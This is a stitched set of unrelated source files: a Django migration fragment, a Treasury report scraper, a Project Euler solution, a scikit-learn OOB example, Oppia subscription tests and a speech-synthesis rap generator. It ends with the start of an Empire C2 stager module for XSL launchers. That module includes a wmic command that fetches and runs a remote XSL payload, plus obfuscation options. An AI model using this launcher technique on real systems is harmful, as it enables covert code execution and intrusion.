(25, "Removed translation"),
(26, "Suggestion removed"),
(27, "Search and replace"),
(29, "Suggestion removed during cleanup"),
(30, "Source string changed"),
(31, "New string added"),
(32, "Bulk status change"),
(33, "Changed visibility"),
(34, "Added user"),
(35, "Removed user"),
(36, "Translation approved"),
(37, "Marked for edit"),
(38, "Removed component"),
(39, "Removed project"),
(40, "Found duplicated language"),
(41, "Renamed project"),
(42, "Renamed component"),
(43, "Moved component"),
(44, "New string to translate"),
(45, "New contributor"),
(46, "New whiteboard message"),
(47, "New component alert"),
],
default=2,
),
),
migrations.AlterField(
model_name="change",
name="comment",
field=models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
to="trans.Comment",
),
),
migrations.AlterField(
model_name="change",
name="suggestion",
field=models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
to="trans.Suggestion",
),
),
]
| gpl-3.0 | -1,935,226,728,235,325,400 | 36.158879 | 62 | 0.429326 | false |
lukerosiak/inspectors-general | inspectors/treasury.py | 2 | 15149 | #!/usr/bin/env python
import datetime
import logging
import os
import re
from urllib.parse import urljoin, unquote
from utils import utils, inspector, admin
# https://www.treasury.gov/about/organizational-structure/ig/Pages/audit_reports_index.aspx
archive = 2005
# options:
# standard since/year options for a year range to fetch from.
#
# Notes for IG's web team:
# - Add an agency for report 'OIG-09-015' listed on
# https://www.treasury.gov/about/organizational-structure/ig/Pages/by-date-2009.aspx
# - There is an extra tr.ms-rteTableEvenRow-default at the end of
# https://www.treasury.gov/about/organizational-structure/ig/Pages/by-date-2014.aspx
# - Add published dates for all reports at
# https://www.treasury.gov/about/organizational-structure/ig/Pages/other-reports.aspx
# - OIG-07-003 is posted twice, once with the wrong date
AUDIT_REPORTS_BASE_URL = "https://www.treasury.gov/about/organizational-structure/ig/Pages/by-date-{}.aspx"
TESTIMONIES_URL = "https://www.treasury.gov/about/organizational-structure/ig/Pages/testimony_index.aspx"
PEER_AUDITS_URL = "https://www.treasury.gov/about/organizational-structure/ig/Pages/peer_audit_reports_index.aspx"
OTHER_REPORTS_URL = "https://www.treasury.gov/about/organizational-structure/ig/Pages/other-reports.aspx"
SEMIANNUAL_REPORTS_URL = "https://www.treasury.gov/about/organizational-structure/ig/Pages/semiannual_reports_index.aspx"
AGENCY_NAMES = {
"bep": "The Bureau of Engraving & Printing",
"bfs": "The Bureau of the Fiscal Service",
"bpd": "The Bureau of the Public",
"cdfi": "The Community Development Financial Institution Fund",
"cfpb": "Consumer Financial Protection Bureau",
"do": "Department of the Treasury",
"esf": "Exchange Stabilization Fund",
"ffb": "Federal Financing Bank",
"fcen": "The Financial Crimes Enforcement Network",
"fincen": "The Financial Crimes Enforcement Network", # Another slug for the above
"fms": "Financial Management Service",
"gcerc": "Gulf Coast Ecosystem Restoration Council",
"ia": "The Office of International Affairs",
"mint": "The U.S. Mint",
"occ": "The Office of the Comptroller of the Currency",
"odcp": "Office of DC Pensions",
"ofac": "The Office of Foreign Assets Control",
"ofr": "Office of Financial Research",
"oig": "Office of the Inspector General",
"ots": "The Office of Thrift",
"restore": "The RESTORE Act",
"sblf": "Small Business Lending Fund",
"ssbci": "State Small Business Credit Initiative",
"tfi": "Office of Terrorism and Financial Intelligence",
"ttb": "The Alcohol and Tobacco Tax and Trade Bureau",
"tff": "Treasury Forfeiture Fund",
}
OTHER_URLS = {
"testimony": TESTIMONIES_URL,
"peer_review": PEER_AUDITS_URL,
"other": OTHER_REPORTS_URL,
}
UNRELEASED_REPORTS = [
# These reports do not say they are unreleased, but there are no links
"IGATI 2006",
"IGATI 2007",
"OIG-CA-07-001",
"OIG-08-039",
"OIG-08-013",
]
REPORT_AGENCY_MAP = {
"OIG-09-015": "mint", # See note to IG web team
}
REPORT_PUBLISHED_MAP = {
"OIG-CA-13-006": datetime.datetime(2013, 3, 29),
"OIG-13-CA-008": datetime.datetime(2013, 6, 10),
"Treasury Freedom of Information Act (FOIA) Request Review": datetime.datetime(2010, 11, 19),
"OIG-CA-14-017": datetime.datetime(2014, 9, 30),
"OIG-CA-14-015": datetime.datetime(2014, 9, 4),
"OIG-CA-15-023": datetime.datetime(2015, 7, 29),
"OIG-CA-15-020": datetime.datetime(2015, 6, 22),
"OIG-15-CA-012": datetime.datetime(2015, 4, 7),
"OIG-CA-15-024": datetime.datetime(2015, 9, 15),
"M-12-12 Reporting": datetime.datetime(2016, 1, 28),
"OIG-CA-16-012": datetime.datetime(2016, 3, 30),
"OIG-CA-16-014": datetime.datetime(2016, 4, 19),
"Role of Non-Career Officials in Treasury FOIA Processing": datetime.datetime(2016, 3, 9),
"OIG-CA-16-028": datetime.datetime(2016, 6, 30),
"OIG-CA-16-033A": datetime.datetime(2016, 7, 29),
"OIG-CA-16-033B": datetime.datetime(2016, 7, 29),
"OIG-CA-17-006": datetime.datetime(2016, 11, 10),
"OIG-CA-17-009": datetime.datetime(2017, 1, 27),
"OIG-CA-17-010": datetime.datetime(2017, 1, 27),
"OIG-CA-17-012": datetime.datetime(2017, 2, 27),
"OIG-CA-17-013": datetime.datetime(2017, 3, 1),
}
def run(options):
year_range = inspector.year_range(options, archive)
if datetime.datetime.now().month >= 10:
# October, November, and December fall into the next fiscal year
# Add next year to year_range to compensate
year_range.append(max(year_range) + 1)
# Pull the audit reports
for year in year_range:
if year < 2006: # This is the oldest year for these reports
continue
url = AUDIT_REPORTS_BASE_URL.format(year)
doc = utils.beautifulsoup_from_url(url)
results = doc.find_all("tr", class_=["ms-rteTableOddRow-default",
"ms-rteTableEvenRow-default"])
if not results:
if year != datetime.datetime.now().year + 1:
raise inspector.NoReportsFoundError("Treasury (%d)" % year)
for result in results:
report = audit_report_from(result, url, year_range)
if report:
inspector.save_report(report)
for report_type, url in OTHER_URLS.items():
doc = utils.beautifulsoup_from_url(url)
results = doc.select("#ctl00_PlaceHolderMain_ctl05_ctl01__ControlWrapper_RichHtmlField > p a")
if not results:
raise inspector.NoReportsFoundError("Treasury (%s)" % report_type)
for result in results:
if len(result.parent.find_all("a")) == 1:
result = result.parent
report = report_from(result, url, report_type, year_range)
if report:
inspector.save_report(report)
doc = utils.beautifulsoup_from_url(SEMIANNUAL_REPORTS_URL)
results = doc.select("#ctl00_PlaceHolderMain_ctl05_ctl01__ControlWrapper_RichHtmlField > p > a")
if not results:
raise inspector.NoReportsFoundError("Treasury (semiannual reports)")
for result in results:
report = semiannual_report_from(result, SEMIANNUAL_REPORTS_URL, year_range)
if report:
inspector.save_report(report)
def clean_text(text):
# A lot of text on this page has extra characters
return text.replace('\u200b', '').replace('\ufffd', ' ').replace('\xa0', ' ').strip()
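# e.g. SUMMARY_RE turns "OIG-16-001: Audit of Something" into the groups
# ("OIG", "16", "001", "Audit of Something")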
SUMMARY_RE = re.compile("(OIG|OIG-CA|EVAL) *-? *([0-9]+) *- *([0-9R]+) *[:,]? +([^ ].*)")
SUMMARY_FALLBACK_RE = re.compile("([0-9]+)-(OIG)-([0-9]+) *:? *(.*)")
FILENAME_RE = re.compile("^(OIG-[0-9]+-[0-9]+)\\.pdf")
def audit_report_from(result, page_url, year_range):
if not clean_text(result.text):
# Empty row
return
# Get all direct child nodes
children = list(result.find_all(True, recursive=False))
published_on_text = clean_text(children[1].text)
# this is the header row
if published_on_text.strip() == "Date":
return None
date_formats = ['%m/%d/%Y', '%m/%d%Y']
published_on = None
for date_format in date_formats:
try:
published_on = datetime.datetime.strptime(published_on_text, date_format)
except ValueError:
pass
report_summary = clean_text(children[2].text)
if not report_summary:
# There is an extra row that we want to skip
return
report_summary = report_summary.replace("OIG-15-38Administrative",
"OIG-15-38 Administrative")
summary_match = SUMMARY_RE.match(report_summary)
summary_match_2 = SUMMARY_FALLBACK_RE.match(report_summary)
if summary_match:
report_id = summary_match.expand(r"\1-\2-\3")
title = summary_match.group(4)
elif summary_match_2:
    report_id = summary_match_2.expand(r"\2-\1-\3")
title = summary_match_2.group(4)
elif report_summary.startswith("IGATI") and published_on is not None:
# There are two such annual reports from different years, append the year
report_id = "IGATI %d" % published_on.year
title = report_summary
elif report_summary == "Report on the Bureau of the Fiscal Service Federal " \
"Investments Branch\u2019s Description of its Investment/" \
"Redemption Services and the Suitability of the Design and Operating " \
"Effectiveness of its Controls for the Period August 1, 2013 to " \
"July 31, 2014":
# This one is missing its ID in the index
report_id = "OIG-14-049"
title = report_summary
elif report_summary == "Correspondence related to the resolution of audit recommendation 1 OIG-16-001 OFAC Libyan Sanctions Case Study (Please read this correspondence in conjunction with the report.)":
# Need to make up a report_id for this supplemental document
report_id = "OIG-16-001-resolution"
title = report_summary
else:
try:
filename_match = FILENAME_RE.match(os.path.basename(result.a["href"]))
report_id = filename_match.group(1)
title = report_summary
except (ValueError, IndexError, AttributeError):
raise Exception("Couldn't parse report ID: %s" % repr(report_summary))
if report_id == 'OIG-15-015' and \
'Financial Statements for hte Fiscal Years 2014 and 2013' in title:
# This report is listed twice, once with a typo
return
if report_id == 'OIG-07-003' and published_on_text == '11/23/2006':
# This report is listed twice, once with the wrong date
return
# There are copy-paste errors with several retracted reports
if report_id == 'OIG-14-037':
if published_on.year == 2011 or published_on.year == 2010:
return
if report_id == 'OIG-13-021' and published_on_text == '12/12/2012':
return
if published_on is None:
admin.log_no_date("treasury", report_id, title)
return
agency_slug_text = children[0].text
if report_id in REPORT_AGENCY_MAP:
agency_slug = REPORT_AGENCY_MAP[report_id]
else:
agency_slug = clean_text(agency_slug_text.split("&")[0]).lower()
if (report_id in UNRELEASED_REPORTS or
"If you would like a copy of this report" in report_summary or
"If you would like to see a copy of this report" in report_summary or
"have been removed from the OIG website" in report_summary or
"removed the auditors\u2019 reports from the" in report_summary or
"Classified Report" in report_summary or
"Classified Audit Report" in report_summary or
"Sensitive But Unclassified" in report_summary or
"To obtain further information, please contact the OIG" in report_summary):
unreleased = True
report_url = None
landing_url = page_url
else:
link = result.select("a")[0]
report_url = urljoin(AUDIT_REPORTS_BASE_URL, link['href'])
if report_url == AUDIT_REPORTS_BASE_URL:
raise Exception("Invalid link found: %s" % link)
unreleased = False
landing_url = None
# HTTPS, even if they haven't updated their links yet
if report_url is not None:
report_url = re.sub("^http://www.treasury.gov", "https://www.treasury.gov", report_url)
if report_url == "https://www.treasury.gov/about/organizational-structure/ig/Documents/OIG-11-071.pdf":
report_url = "https://www.treasury.gov/about/organizational-structure/ig/Documents/OIG11071.pdf"
if published_on.year not in year_range:
logging.debug("[%s] Skipping, not in requested range." % report_url)
return
report = {
'inspector': 'treasury',
'inspector_url': 'https://www.treasury.gov/about/organizational-structure/ig/',
'agency': agency_slug,
'agency_name': AGENCY_NAMES[agency_slug],
'type': 'audit',
'report_id': report_id,
'url': report_url,
'title': title,
'published_on': datetime.datetime.strftime(published_on, "%Y-%m-%d"),
}
if unreleased:
report['unreleased'] = unreleased
if landing_url:
report['landing_url'] = landing_url
return report
def report_from(result, page_url, report_type, year_range):
try:
title, date1, date2 = result.text.rsplit(",", 2)
published_on_text = date1 + date2
published_on = datetime.datetime.strptime(published_on_text.strip(), '%B %d %Y')
except ValueError:
try:
title, date1, date2, date3 = result.text.rsplit(maxsplit=3)
published_on_text = date1 + date2 + date3
published_on = datetime.datetime.strptime(published_on_text.strip(), '%B%d,%Y')
except ValueError:
title = result.text
published_on = None
title = clean_text(title)
original_title = title
report_id, title = title.split(maxsplit=1)
report_id = report_id.rstrip(":")
if result.name == "a":
link = result
else:
link = result.a
report_url = urljoin(page_url, link['href'])
# HTTPS, even if they haven't updated their links yet
report_url = re.sub("^http://www.treasury.gov", "https://www.treasury.gov", report_url)
if report_id.find('-') == -1:
# If the first word of the text doesn't contain a hyphen,
# then it's probably part of the title, and not a tracking number.
# In this case, fall back to the URL.
report_filename = report_url.split("/")[-1]
report_id, extension = os.path.splitext(report_filename)
report_id = unquote(report_id)
# Reset the title, since we previously stripped off the first word
# as a candidate report_id.
title = original_title
if report_id in REPORT_PUBLISHED_MAP:
published_on = REPORT_PUBLISHED_MAP[report_id]
if not published_on:
admin.log_no_date("treasury", report_id, title, report_url)
return
# Skip this report, it already shows up under other audit reports
if report_id == "Role of Non-Career Officials in Treasury FOIA Processing":
return
if published_on.year not in year_range:
logging.debug("[%s] Skipping, not in requested range." % report_url)
return
report = {
'inspector': 'treasury',
'inspector_url': 'https://www.treasury.gov/about/organizational-structure/ig/',
'agency': 'treasury',
'agency_name': "Department of the Treasury",
'type': report_type,
'report_id': report_id,
'url': report_url,
'title': title,
'published_on': datetime.datetime.strftime(published_on, "%Y-%m-%d"),
}
return report
def semiannual_report_from(result, page_url, year_range):
published_on_text = clean_text(result.text)
published_on = datetime.datetime.strptime(published_on_text.strip(), '%B %d, %Y')
title = "Semiannual Report - {}".format(published_on_text)
report_url = urljoin(page_url, result['href'])
# HTTPS, even if they haven't updated their links yet
report_url = re.sub("^http://www.treasury.gov", "https://www.treasury.gov", report_url)
report_filename = report_url.split("/")[-1]
report_id, extension = os.path.splitext(report_filename)
report_id = unquote(report_id)
if published_on.year not in year_range:
logging.debug("[%s] Skipping, not in requested range." % report_url)
return
report = {
'inspector': 'treasury',
'inspector_url': 'https://www.treasury.gov/about/organizational-structure/ig/',
'agency': 'treasury',
'agency_name': "Department of the Treasury",
'type': 'semiannual_report',
'report_id': report_id,
'url': report_url,
'title': title,
'published_on': datetime.datetime.strftime(published_on, "%Y-%m-%d"),
}
return report
utils.run(run) if (__name__ == "__main__") else None
| cc0-1.0 | 3,522,391,499,883,024,000 | 37.255051 | 204 | 0.676678 | false |
Igglyboo/Project-Euler | 1-99/30-39/Problem35.py | 1 | 1086 | from time import clock
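# Project Euler 35: count the circular primes below one million (a circular
# prime stays prime under every rotation of its digits).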
def timer(function):
def wrapper(*args, **kwargs):
start = clock()
print(function(*args, **kwargs))
print("Solution took: %f seconds." % (clock() - start))
return wrapper
@timer
def find_answer():
total = 0
primes = sieve(1000000)
primes.remove(0)
for prime in primes:
p_str = list(str(prime))
p_str.append(p_str.pop(0))
for i in range(len(p_str) - 1):
current = int(''.join(x for x in p_str))
if current not in primes:
break
p_str.append(p_str.pop(0))
else:
total += 1
return total
def sieve(upperlimit):
l = list(range(2, upperlimit + 1))
# Do p = 2 first so we can change step size to 2*p below
for i in range(4, upperlimit + 1, 2):
l[i - 2] = 0
for p in l:
if p ** 2 > upperlimit:
break
elif p:
for i in range(p * p, upperlimit + 1, 2 * p):
l[i - 2] = 0
return set(l)
if __name__ == "__main__":
find_answer()
| unlicense | 2,629,917,463,131,232,000 | 20.294118 | 63 | 0.503683 | false |
karstenw/nodebox-pyobjc | examples/Extended Application/sklearn/examples/ensemble/plot_ensemble_oob.py | 1 | 4073 | """
=============================
OOB Errors for Random Forests
=============================
The ``RandomForestClassifier`` is trained using *bootstrap aggregation*, where
each new tree is fit from a bootstrap sample of the training observations
:math:`z_i = (x_i, y_i)`. The *out-of-bag* (OOB) error is the average error for
each :math:`z_i` calculated using predictions from the trees that do not
contain :math:`z_i` in their respective bootstrap sample. This allows the
``RandomForestClassifier`` to be fit and validated whilst being trained [1].
The example below demonstrates how the OOB error can be measured at the
addition of each new tree during training. The resulting plot allows a
practitioner to approximate a suitable value of ``n_estimators`` at which the
error stabilizes.
.. [1] T. Hastie, R. Tibshirani and J. Friedman, "Elements of Statistical
Learning Ed. 2", p592-593, Springer, 2009.
"""
import matplotlib.pyplot as plt
from collections import OrderedDict
from sklearn.datasets import make_classification
from sklearn.ensemble import RandomForestClassifier, ExtraTreesClassifier
# Author: Kian Ho <[email protected]>
# Gilles Louppe <[email protected]>
# Andreas Mueller <[email protected]>
#
# License: BSD 3 Clause
# nodebox section
if __name__ == '__builtin__':
    # we're running inside NodeBox
import os
import tempfile
W = 800
inset = 20
size(W, 600)
plt.cla()
plt.clf()
plt.close('all')
def tempimage():
fob = tempfile.NamedTemporaryFile(mode='w+b', suffix='.png', delete=False)
fname = fob.name
fob.close()
return fname
imgx = 20
imgy = 0
def pltshow(plt, dpi=150):
global imgx, imgy
temppath = tempimage()
plt.savefig(temppath, dpi=dpi)
dx,dy = imagesize(temppath)
w = min(W,dx)
image(temppath,imgx,imgy,width=w)
imgy = imgy + dy + 20
os.remove(temppath)
size(W, HEIGHT+dy+40)
else:
def pltshow(mplpyplot):
mplpyplot.show()
# nodebox section end
print(__doc__)
RANDOM_STATE = 123
# Generate a binary classification dataset.
X, y = make_classification(n_samples=500, n_features=25,
n_clusters_per_class=1, n_informative=15,
random_state=RANDOM_STATE)
# NOTE: Setting the `warm_start` construction parameter to `True` disables
# support for parallelized ensembles but is necessary for tracking the OOB
# error trajectory during training.
ensemble_clfs = [
("RandomForestClassifier, max_features='sqrt'",
RandomForestClassifier(warm_start=True, oob_score=True,
max_features="sqrt",
random_state=RANDOM_STATE)),
("RandomForestClassifier, max_features='log2'",
RandomForestClassifier(warm_start=True, max_features='log2',
oob_score=True,
random_state=RANDOM_STATE)),
("RandomForestClassifier, max_features=None",
RandomForestClassifier(warm_start=True, max_features=None,
oob_score=True,
random_state=RANDOM_STATE))
]
# Map a classifier name to a list of (<n_estimators>, <error rate>) pairs.
error_rate = OrderedDict((label, []) for label, _ in ensemble_clfs)
# Range of `n_estimators` values to explore.
min_estimators = 15
max_estimators = 175
for label, clf in ensemble_clfs:
for i in range(min_estimators, max_estimators + 1):
clf.set_params(n_estimators=i)
clf.fit(X, y)
# Record the OOB error for each `n_estimators=i` setting.
oob_error = 1 - clf.oob_score_
error_rate[label].append((i, oob_error))
# Generate the "OOB error rate" vs. "n_estimators" plot.
for label, clf_err in error_rate.items():
xs, ys = zip(*clf_err)
plt.plot(xs, ys, label=label)
plt.xlim(min_estimators, max_estimators)
plt.xlabel("n_estimators")
plt.ylabel("OOB error rate")
plt.legend(loc="upper right")
# plt.show()
pltshow(plt)
| mit | 7,607,601,848,409,383,000 | 32.385246 | 82 | 0.64056 | false |
souravbadami/oppia | core/controllers/subscriptions_test.py | 1 | 5437 | # Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for user subscriptions."""
from core.domain import subscription_services
from core.platform import models
from core.tests import test_utils
import feconf
(user_models,) = models.Registry.import_models([models.NAMES.user])
class SubscriptionTests(test_utils.GenericTestBase):
USER_EMAIL = '[email protected]'
USER_USERNAME = 'user'
USER2_EMAIL = '[email protected]'
USER2_USERNAME = 'user2'
def setUp(self):
super(SubscriptionTests, self).setUp()
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.editor_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
self.signup(self.USER_EMAIL, self.USER_USERNAME)
self.user_id = self.get_user_id_from_email(self.USER_EMAIL)
self.signup(self.USER2_EMAIL, self.USER2_USERNAME)
self.user_id_2 = self.get_user_id_from_email(self.USER2_EMAIL)
def test_subscribe_handler(self):
"""Test handler for new subscriptions to creators."""
self.login(self.USER_EMAIL)
csrf_token = self.get_new_csrf_token()
payload = {
'creator_username': self.EDITOR_USERNAME
}
# Test that the subscriber ID is added to the list of subscribers
# of the creator and the creator ID is added to the list of
# subscriptions of the user.
self.post_json(
feconf.SUBSCRIBE_URL_PREFIX, payload,
csrf_token=csrf_token)
self.assertEqual(subscription_services.get_all_subscribers_of_creator(
self.editor_id), [self.user_id])
self.assertEqual(
subscription_services.get_all_creators_subscribed_to(
self.user_id), [self.editor_id])
# Subscribing again, has no effect.
self.post_json(
feconf.SUBSCRIBE_URL_PREFIX, payload,
csrf_token=csrf_token)
self.assertEqual(subscription_services.get_all_subscribers_of_creator(
self.editor_id), [self.user_id])
self.assertEqual(
subscription_services.get_all_creators_subscribed_to(
self.user_id), [self.editor_id])
self.logout()
# Test another user subscription.
self.login(self.USER2_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
feconf.SUBSCRIBE_URL_PREFIX, payload,
csrf_token=csrf_token)
self.assertEqual(subscription_services.get_all_subscribers_of_creator(
self.editor_id), [self.user_id, self.user_id_2])
self.assertEqual(
subscription_services.get_all_creators_subscribed_to(
self.user_id_2), [self.editor_id])
self.logout()
def test_unsubscribe_handler(self):
"""Test handler for unsubscriptions."""
payload = {
'creator_username': self.EDITOR_USERNAME
}
# Add one subscription to editor.
self.login(self.USER_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
feconf.SUBSCRIBE_URL_PREFIX, payload,
csrf_token=csrf_token)
self.logout()
# Add another subscription.
self.login(self.USER2_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
feconf.SUBSCRIBE_URL_PREFIX, payload,
csrf_token=csrf_token)
# Test that on unsubscription, the learner ID is removed from the
# list of subscriber IDs of the creator and the creator ID is
# removed from the list of subscriptions of the learner.
self.post_json(
feconf.UNSUBSCRIBE_URL_PREFIX, payload,
csrf_token=csrf_token)
self.assertEqual(subscription_services.get_all_subscribers_of_creator(
self.editor_id), [self.user_id])
self.assertEqual(
subscription_services.get_all_creators_subscribed_to(
self.user_id_2), [])
# Unsubscribing the same user has no effect.
self.post_json(
feconf.UNSUBSCRIBE_URL_PREFIX, payload,
csrf_token=csrf_token)
self.assertEqual(subscription_services.get_all_subscribers_of_creator(
self.editor_id), [self.user_id])
self.assertEqual(
subscription_services.get_all_creators_subscribed_to(
self.user_id_2), [])
self.logout()
# Unsubscribing another user.
self.login(self.USER_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
feconf.UNSUBSCRIBE_URL_PREFIX, payload,
csrf_token=csrf_token)
self.assertEqual(subscription_services.get_all_subscribers_of_creator(
self.editor_id), [])
self.assertEqual(
subscription_services.get_all_creators_subscribed_to(
self.user_id), [])
| apache-2.0 | -6,100,545,665,668,864,000 | 35.986395 | 78 | 0.63638 | false |
ruofengchen/mc-hawking | rap_gen.py | 1 | 6438 | import subprocess
from numpy import *
from scipy import *
import wave
import scipy.io.wavfile
import scipy.signal
import random
import pylab
import pdb
'''By Ruofeng Chen, April 2013'''
voices = ["Albert", "Bad News", "Bahh", "Bells", "Boing", "Bubbles", "Cellos", "Deranged", "Good News", "Hysterical", "Pipe Organ", "Trinoids", "Whisper", "Zarvox"]
pulses = {}
pulses[1] = [0]
pulses[2] = [0, 4]
pulses[3] = [0, 4, 8]
pulses[4] = [12, 16, 20, 24]
pulses[5] = [8, 12, 16, 20, 24]
pulses[6] = [6, 8, 12, 16, 20, 24]
pulses[7] = [6, 8, 10, 12, 22, 24, 28]
pulses[8] = [6, 8, 10, 12, 22, 24, 26, 28]
pulses[9] = [6, 8, 10, 12, 16, 20, 24, 26, 28]
pulses[10] = [4, 6, 8, 10, 12, 16, 20, 24, 26, 28]
pulses[11] = [4, 6, 8, 10, 12, 16, 18, 20, 24, 26, 28]
pulses[12] = [4, 6, 8, 10, 12, 16, 18, 20, 22, 24, 26, 28]
pulses[13] = [2, 4, 6, 8, 10, 12, 16, 18, 20, 22, 24, 26, 28]
pulses[14] = [0, 2, 4, 6, 8, 10, 12, 16, 18, 20, 22, 24, 26, 28]
pulses[15] = [0, 2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28]
pulses[16] = [0, 2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30]
# ratios = [1, 1.1, 1.2, 1.1, 1, 1.1, 1.2, 1.1, 1, 1.1, 1.2, 1.1, 1, 1.1, 1.2, 1.1]
synth_path = "./synth"
rap_path = "./rap"
def time_stretch_half(dafxin):
    '''Compress audio to half its duration by overlap-adding every other Hann-windowed frame.'''
hopsize = 480 # sounds good using this parameter
framesize = 2 * hopsize
hannWin = hanning(framesize)
framenum = dafxin.size / hopsize - 1
dafxout = zeros(hopsize*(framenum/2)+framesize)
for n in range(framenum):
if n % 2 == 0:
dafxout[n/2*hopsize:n/2*hopsize+framesize] = dafxout[n/2*hopsize:n/2*hopsize+framesize] + dafxin[n*hopsize:n*hopsize+framesize] * hannWin
return dafxout
def synth(words, voice="Fred"):
for word in words:
fullcmd = ['say', '-v', voice, '-o', synth_path+'/'+str(hash(word))+'.wav', '--data-format=LEI16@44100', word]
subprocess.check_output(fullcmd)
def align_to_beats(everything):
    '''Mix the extracted syllables onto sixteenth-note pulses over a 140 BPM drum loop.'''
tempo = 140
intvl = 0.25 / (tempo / 60.) * 44100.
total_len = 8 / (tempo / 60.) * 44100.
data_list = []
for tup in everything:
for i in range(len(tup[1])):
data_list.append(tup[0][tup[1][i]:tup[2][i]])
    fs, rapdata = scipy.io.wavfile.read(open('drum_1bar.wav', 'rb'))
rapdata = float32(rapdata / float(2**16))
rapdata = mean(rapdata, 1)
rapdata = rapdata * 0.2
# rapdata = zeros(total_len * 1.5) # if you don't want accompaniment
total_voice_len = sum([data.size for data in data_list])
syllable_num = len(data_list)
if syllable_num > 16:
syllable_num = 16
# this will result in overlapping words
pulse = pulses[syllable_num]
for s in range(syllable_num):
start = pulse[s] * intvl
if s < syllable_num - 1 and data_list[s].size > 1.5 * (pulse[s+1] - pulse[s]) * intvl:
data_list[s] = time_stretch_half(data_list[s])
if s == 0:
rapdata[start:start+data_list[s].size] = rapdata[start:start+data_list[s].size] + data_list[s] * 2.
elif pulse[s] % 4 == 0:
rapdata[start:start+data_list[s].size] = rapdata[start:start+data_list[s].size] + data_list[s] * 1.2
else:
rapdata[start:start+data_list[s].size] = rapdata[start:start+data_list[s].size] + data_list[s]
# pylab.plot(rapdata)
# pylab.show()
    # delete the trailing zeros
first_zero = rapdata.size-1
while rapdata[first_zero] == 0:
first_zero = first_zero - 1
rapdata = rapdata[0:first_zero]
    # delete the leading 0.2 s of samples
rapdata = rapdata[0.2*44100:-1]
rapdata = rapdata / max(abs(rapdata)) * 0.4
rapdata = array(rapdata * float(2**16), dtype=int16)
return rapdata
def find_onsets_and_offsets(data):
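    '''Return (onsets, offsets) sample-index arrays for spans where frame
    energy exceeds the threshold; spans shorter than 0.2 s are merged with
    the shorter neighbouring span.'''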
th = 0
hopsize = 512
framenum = data.size / hopsize
# find all onsets
energy0 = 0
onsets = []
offsets = []
for n in range(framenum):
energy1 = sum(data[n*hopsize:(n+1)*hopsize] ** 2) / hopsize
if energy0 <= th and energy1 > th:
ind = n*hopsize
onsets.append(ind)
# from this onset on, find its corresponding offset
n2 = n
energy2 = energy1
while (n2+1)*hopsize <= data.size and energy2 > th:
energy2 = sum(data[n2*hopsize:(n2+1)*hopsize] ** 2) / hopsize
n2 = n2 + 1
if (n2+1)*hopsize > data.size:
offsets.append(data.size-1)
else:
offsets.append(n2*hopsize)
energy0 = energy1
if len(onsets) != len(offsets):
print "Big problem!!! Onsets != Offsets"
# for all words that are too short, merge them with the shorter neighbor
if len(onsets) > 1:
while True:
short_count = 0
for i in range(len(onsets)):
if offsets[i] - onsets[i] < 44100 * 0.2:
short_count = short_count + 1
if short_count == 0:
break
for i in range(len(onsets)):
if offsets[i] - onsets[i] < 44100 * 0.2:
if i >= 1 and i <= len(onsets)-2:
if offsets[i-1] - onsets[i-1] < offsets[i+1] - onsets[i+1]:
onsets.pop(i)
offsets.pop(i-1)
else:
onsets.pop(i+1)
offsets.pop(i)
elif i == 0:
onsets.pop(i+1)
offsets.pop(i)
else:
onsets.pop(i)
offsets.pop(i-1)
break
return array(onsets, int), array(offsets, int)
def from_text_to_wavfile(sentence):
words = sentence.split(" ")
synth(words)
everything = []
for word in words:
        fs, data = scipy.io.wavfile.read(open(synth_path+'/'+str(hash(word))+'.wav', 'rb'))
data = float32(data / float(2**16))
if fs != 44100:
print "warning: fs is not 44100!!!!!!"
onsets, offsets = find_onsets_and_offsets(data)
everything.append((data, onsets, offsets))
rapdata = align_to_beats(everything)
scipy.io.wavfile.write(rap_path+'/'+str(hash(sentence))+'-rap.wav', 44100, rapdata)
if __name__ == '__main__':
# generate the audio
sentence = '''thank you so much for coming tonight'''
from_text_to_wavfile(sentence)
| gpl-2.0 | 5,563,728,229,412,827,000 | 34.373626 | 164 | 0.540385 | false |
Hackplayers/Empire-mod-Hackplayers | lib/stagers/windows/starfighters_xsl.py | 1 | 61839 | from lib.common import helpers
from termcolor import colored
class Stager:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'XSL Launcher StarFighter',
'Author': ['@CyberVaca'],
'Description': ('Generates a .xsl launcher for Empire.'),
'Comments': [
'wmic process get brief /format:"http://10.10.10.10/launcher.xsl"'
]
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Listener': {
'Description': 'Listener to generate stager for.',
'Required': True,
'Value': ''
},
'Language' : {
'Description' : 'Language of the stager to generate.',
'Required' : True,
'Value' : 'powershell'
},
'StagerRetries': {
'Description': 'Times for the stager to retry connecting.',
'Required': False,
'Value': '0'
},
'Base64' : {
'Description' : 'Switch. Base64 encode the output.',
'Required' : True,
'Value' : 'True'
},
'Obfuscate' : {
'Description' : 'Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.',
'Required' : False,
'Value' : 'False'
},
'ObfuscateCommand' : {
'Description' : 'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.',
'Required' : False,
'Value' : r'Token\All\1,Launcher\STDIN++\12467'
},
'OutFile': {
'Description': 'File to output XSL to, otherwise displayed on the screen.',
'Required': False,
'Value': '/tmp/launcher.xsl'
},
'UserAgent': {
'Description': 'User-agent string to use for the staging request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'Proxy': {
'Description': 'Proxy to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
